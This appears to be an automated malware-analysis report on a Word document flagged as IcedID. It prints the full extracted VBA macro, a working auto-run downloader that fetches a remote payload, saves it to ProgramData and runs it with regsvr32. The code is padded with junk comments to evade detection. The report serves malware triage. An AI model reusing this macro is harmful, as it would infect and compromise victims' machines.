Verdict: MALICIOUS
Risk Score: 290
Heuristics: 7
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings): document contains a VBA project, i.e. VBA macros are present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Set sOftw = CreateObject(EozAc + "." + "shell")`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set tRcbJ = VBA.CreateObject(LmSbJ + "" + xAmKA)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs listed for this sample were found in document text (OOXML body / shared strings).
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13270 bytes | fb87660755d9eb949da2a0b16022d9685f73b37a5a9b73e0072e64618f8ac8a4 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "cBrgv"
Sub rblrj(auLMT, Optional ByVal cqSZq As String = "c:\programdata\IXGTg.txt", Optional ByVal xAmKA As String = "systemobject")
' Proclivities celebrant retailer succinctness
' Independent economise clogging backbones
' Wont divergence stigma
' Mara synthesisers phoner repetitions
' Uptotheminute reasoners barbarous
' Nervous sightseers recklessness
' Obstructing sickens deviousness bowels differently cuddliness
' Commendations unalike paradigmatic converter enchantingly
' Murderers
' Biasses secretly
' Pelt verdant greenfly refractory
' Supertankers distrustful coke adroit
' Cladding rightward stalker persecutions capsizes equilibria thickens
' Civilised pruners arsenide bullfinch strontium
' Girths structuralist timeframe
' Sneakier
' Quantification condemnation quackish
' Cleared singleness footstep colony willynilly
' Macro vials teasing
' Intransitive removing interchanged pooches heterogeneous kitted
' Idaho swazi quiveringly paris reminiscences
Set tRcbJ = VBA.CreateObject(LmSbJ + "" + xAmKA)
' Irregular unsentimental converter whacko matrimonially
' Tachograph spoonful
' Calorimeters underpinning irreversibly
' Gauls disturbingly
' Abounds etymologies
Set njDIL = tRcbJ.CreateTextFile(cqSZq)
' Gongs coathanger
' Cashed fixate
' Instance fishhook authorities
' Alpha ascertain heralds soiled
' Inspecting tilts
njDIL.WriteLine auLMT
' Schnapps earths stereotypical pasteurised
' Unnoticed carpentry
' Jargons renew
' Streptococci
' Blower riches remitting
' Protestors egrets assyria pettishly exiling
' Unfurls limbo uteri
njDIL.Close
' Planning toiling voter totalitarian
' Conglomerates acquisitiveness unrehearsed blackboard crap wildoats
' Delivers abbreviation
' Fluke
' Hookah succeed gestate
' Markers bombardier boozed
' Primitive opium jejune bronchi ecology
' Stereographic descant
' Emergence referee
' Eigenstates
' Multiply gunsmiths refutations expunged
' Constrictor gruelling
' Explode startling
' Facial ineffective squeeze unrelenting
' Tried restlessly presences abbreviations matriculate
' Licentiate crater
' Dog
' Ranges synonymy resubmit backdrop displaces
' Certifying
' Pipits scuffling pederasts
' Intensified condensations toothless intones
' Giant grammatically glare tangy follicular
' Attachable contouring lifestyles livestock
' Clumped haphazard
' Charity dozes myopic
' Prefatory aground wardrobes
' Championed incuriously materialise reminisce benefiting ornately
' Warlords fidelity giving sonorous
' Vehement adhered
' Reintroductions
' Batch
' Thyroids phonological collating defaming balmoral
' Drawings shrewder martin
' Atropine mights
' Sluggard spacer regret amethystine stability
' Openly unrewarded lyres
' Providable helpmate naturalists diary
' Sublimity parallelograms rollers
' Chemise exponential
' Apostasy
' Unctuous gainers hardhearted
End Sub
' Vendettas reaping aglow
' Pounce omnipresent ruthlessness healths stepping
' Batches militates
' Interchangeable wag brilliancy
Sub AutoOpen()
' Supplements epileptics stinted seeing
' Crypts
' Anyplace siphons
' Woodwork unperturbed florins
' Eighties fording chatter typeface joking
' Aware peaks localities
' Passers outside featherweight
' Depoliticisation posers sublimated beeps floppiest
' We outsourcing corpus aspirant helpmate
' Rankling leggings
' Inexperience huckleberry teaser fabricate debacle derate
' Starched ghoul
' Spongy contributions
' Surefooted bespoke
' Beatitude
' Fixers undeniable kneecaps
' Naiads fastenings
' Erosion girth hunters topping subside
' Crept sexuality deponent grovelled hypermarkets
' Smiles
' Slope staving suppurating outstretched admittance
' Millipede humanoids
' Expostulate decustomised idaho
' Operational humorously
' Ratings unchartered pistols interpenetration satellite
' Quit classlessness astonishing
' Payment rapping concurrency scrutinising beam
' Convexity flakiest rheumatic drily offset
' Reflector speedometer egregious
Dim ZtADq As New XKcmz
' Dichotomy propitiating seethe
' Mosque timings
' Monetarists shatteringly cognizant
' Treasons extends
' Furry whirlpools convulsive
MqJVd = ""
' Chiding slacked conquistadores chore
' Tanking projections
' Bugler tussocky massacres poland
' Oversaw screed deprives tonedeaf overcooked
' Deplored hairs
' Pottage wrung painting
' Adipose
' Cautionary
' Compere harridan
' Vesicles facilitating intuitiveness sidesteps
' Mouthful implied supplanted pointlessly
auLMT = ZtADq.LeOal(LuGdo)
' Despoiling
' Penetrating unwedge practice wades greasepaint warmest
' Unbanning unprofitable peddled harassed
' Malls genome
' Doctors proliferative stabler resounded resounded
' Octant requisition
rblrj RAcFP(auLMT)
' Marshier
' Feeders
' Victimising consult gleans trends
' Upholstery wadis wheedled tropically strangles skimp
' Obedience graphology along pointy avail monophonic
' Unreported recaptured gulf elaborates
' Extensibility skewers mohair inquisitorially
' Gifting coolness pine pendants
' Slickness subprogram
' Airports footpads break tragically
' Kick
MGAFQ GlJiG(0) + "vr32 c:\programdata\IXGTg.txt", "wscript"
End Sub
Function LUvaB(CbtFf, qVGnh)
' Diplomat snowploughs covenanters
' Flogs shrill dimer
' Coarsens systolic stratified inaccessibility fending
' Battering perils cannot megawatt
LUvaB = Split(CbtFf, qVGnh)
End Function
Attribute VB_Name = "NQsvf"
' Prickle bewitched angels glycol
' Hounded ruffles
' Benighted blazer waffled
' Magnanimous virtues shuttered baseless mummified
Function RAcFP(jsRjD)
' Scrutineers watched untroubled maori renters xenon
' Ringleaders holier deviations
' Hindsight pointers profitable parachute restorations
' Catacombs rebuff managership
' Cuirass tip fishmongers
' Depositors each cochlear without boer medicated
RAcFP = StrConv(jsRjD, vbUnicode)
' Lurked nightingale
' Tenability donation espying
' Misfortunes
' Fretted stoppage hypothesiser workweek tea
End Function
' Pustule sureness derogations
' Purveyance wherefores spooked
' Goodbye keystrokes
' Repetitive ennobles oddjob
' Outrageous redundancy hotheaded gordian culmination
Function RNMur()
' Wildcat bandits mediating
' Raucous resonator steady distributable braking unscaled
' Peseta radiantly responder
' Fixture millenarianism creators dodgy
' Institutionalise crotchety hatful evidences
' Appropriates peaceful lobotomies
' Kilowatts leftover conquering barcode
' Circumcision fettered rural
With ActiveDocument.shapes(1)
RNMur = .AlternativeText
End With
End Function
' Paperthin condescends buys
' Droplet
' Hitchhiked skinflint propulsion
' Pincer
Function GlJiG(QaATG)
' Mercilessly connexion newt
' Spoiler froggy acquiescing unfits
' Epidemic conduits bodily centrists
' Owned disobeying soapbox
' Prevailed docility espied disquiet
' Overrepresented
' Manicured interruption level hoe
' Sabras spraining
' Tranches
' Derailing construction cyclops
' Typewriter
' Reshowing pry ski
FKbpO = LUvaB(RNMur(), "~~~")
sqURb = FKbpO(QaATG)
GlJiG = sqURb
End Function
Attribute VB_Name = "XKcmz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JYgep(fakev, aLUMi, kTjDK)
' Levitates shoelaces environments
' Shanks souk platitudinous recklessly
' Cash pulp situationist idioms unarguably anthology
' Stereographic onions
' Latest
' Clutching imprudently started deity offending disyllable pledged
JYgep = Mid(fakev, aLUMi, kTjDK)
End Function
Public Function bTBMI(trmIp, mRYMe)
' Outages floodlights robotic sons
' Easiness chinked lactation gymnast determinative sledge
' Intrinsically revivifying reprinted
' Milieus hairs adulterer
' Forfeiture sarong outfitters bricklaying
' Locked octave gale
' Fell
' Jut unimaginably subconscious
' Disquiet naples toughie blackbird
' Exclaims perplexities
' Disarm republic
' Hyphen insinuatingly irrigate lithosphere
' Acclamation etal translating multitudes sorrow
' Misadventure conformal skunks
' Rest overproduced
' Descriptively windfall
' Outliers fictional scudded reasonless deprive
yAZKP = Trim(trmIp)
For DspYC = mRYMe To Len(yAZKP)
DqnAu = JYgep(yAZKP, DspYC, mRYMe) & DqnAu
Next DspYC
bTBMI = DqnAu
End Function
' Restaurateurs misdiagnosis arthropods pleasingly controls
' Tableau oversee
' Illfated aversive
' Crocodiles incommoding truer
' Shrubbery
Function LeOal(LQELe)
' Disco tribute counterpane
' Punctured mummies jehad
' Tipple carve deeps induct
' Wagon sadism frugally
' Hydromagnetic debugging superpose licensed
' Computers maidenly
Dim WajvI As Object
' Krypton tuppences glower petrological wishful amiably
' Earthquake cloaca disintegrate blurring
' Obliquity
' Measure
' Unveiled southerners trap frailly ticketed paraboloid
' Ensign immutably waterproofed rugs noun ado
' Bicycling milked enzymatic bilingual pane
' Suggests hairdo fluster rental
' Nightfall emersion
' Wincing misfortune
Set WajvI = CreateObject(bTBMI(LQELe, 1) + "." + bTBMI(LQELe, 1) + "Request.5.1")
' Babel
' Individually prescriptions semiconscious meltdown
' Moiety consecutively dormer spottiest
' Chicks blackballing brig palp gorges
' Foment advancements frustratedly steamship
' Polyatomic smuts imparting
' Backside harbour modulating
' Smarter exothermically
' Sluggards
' Cornice grovelling seeable
' Restfulness chequer woodwork tripe
' Dilator integrable gimmicks contractions scavenged girls
' Turk unawed fibula
' Diameter ginger stack imaginings
' Stagnating ruggedly
' Servers stated retune
' Lumpier honshu tendered
' Leggings comparative reportage gazelles relieved
' Feminists review unaccompanied
' Harrowed stakeholders referencer muzzled
' Mistype microcosm paucity
Vrxyo = GlJiG(1)
' Chief cheeses aupair
' Theologists accretion crores
' Proofreading operettas weighed bottleneck invalidating complemented
' Miler hire adolescents flocking
' Leaderless
' Scurry vernier jumbles briskness coconuts bleeping
WajvI.Open "GET", bTBMI(Vrxyo, 1), False
' Rubbishing hydrolysis
' Diminution hyphenates decontaminating peels borough
' Relight indiscretions
' Filter spangle mundanely amateurish
' Fords unlabelled
' Excited floodlight
WajvI.Send
' Widened brittleness
' Catalogues exertions
' Ushers slanted
' Tanks goalscorer
' Tendons jobbing
' Array irrational ignored
LeOal = WajvI.responsebody
End Function
Attribute VB_Name = "nHXSE"
Public Const LuGdo As String = "ptthniw"
Public Const LmSbJ As String = "scripting.file"
Sub MGAFQ(YZipr, EozAc)
' Italian sinisterly
' Senseless overreached dowse superseding
' Execute paces incitement bidet
' Bookshelves memento countesses kinsmen saliva
' Pulsates snick
Set sOftw = CreateObject(EozAc + "." + "shell")
' Scrupulously combatant
' Bushfire overstatement rummages buns
' Vilify scarlet
' Emanations putting hotdogs imbiber jolly dawdle
' Leprosy remastered constructable depict
' Pore
' Skimmer unwise delight perplexed
' Thoroughfare regretful turntable rental spilling rarefactions
' Tenets coachload typhus
' Blur sleaziest headcount usable unevenly
' Matchplay antipathies facsimile sparred hoarfrost gnostic
' Macho ouster cheese unpredictable bagpiper mangler
' Photograph
' Constructivist recounts soaped
' Spilling fiftieth pertained ream
' Steamship moonrise saluted cloudburst sanatorium
' Chloroquine ordinances changer baboon
' Sandbank harassing thrower crackling
' Faun
' Prayerful sheltered allurement pretext fluffy
' Allotting necessity musical isthmus
' Touts mornings madness buffers
' Unwisest bashful solidity hulk anvil carets
' Slackening pink glinted forming pillowed thrilling
' Borrowable
' Tempera boreholes
' Hospitably iguanas supposing
' Firming emulsifies ironwork
' Polycyclic foxier
' Accretion teenyweeny rouses whittle
' Pencils low pentameters
' Dock inhumane blemishes croupier brushed sheared judged
' Automats interlacing dials
' Militating strokes gauged reopens
' Descended
' Firsts heavies glitzy replaced ridicule
' Complements buttock newsreel eking transmigration
' Ptolemy eland backhanded
' Moribundity ink dimpled abstinence
' Familiar portraying roasts revival
' Winningly unvoiced
' Fleecing traditionalists
' Offence hubris oddity cleaver enfeeble
' Painless whereby vacuously dulls
' Fumigating insensibly gates croatia zion jumping privatising
Call sOftw.exec(YZipr)
' Unsophistication wingspan
' Shampooing intimidating umbras unbounded
' Outwards moveable
' Pardoning slippery rendered bobbins squirearchy
' Kindergarten reclaimable busy restriction
' Parenthood angered loincloth buffetings
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 48128 bytes | 7d453191b86924bf9bd367d0c8ee9be39a447f0f283d2c28aa023e883a772eec |

Detection
- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely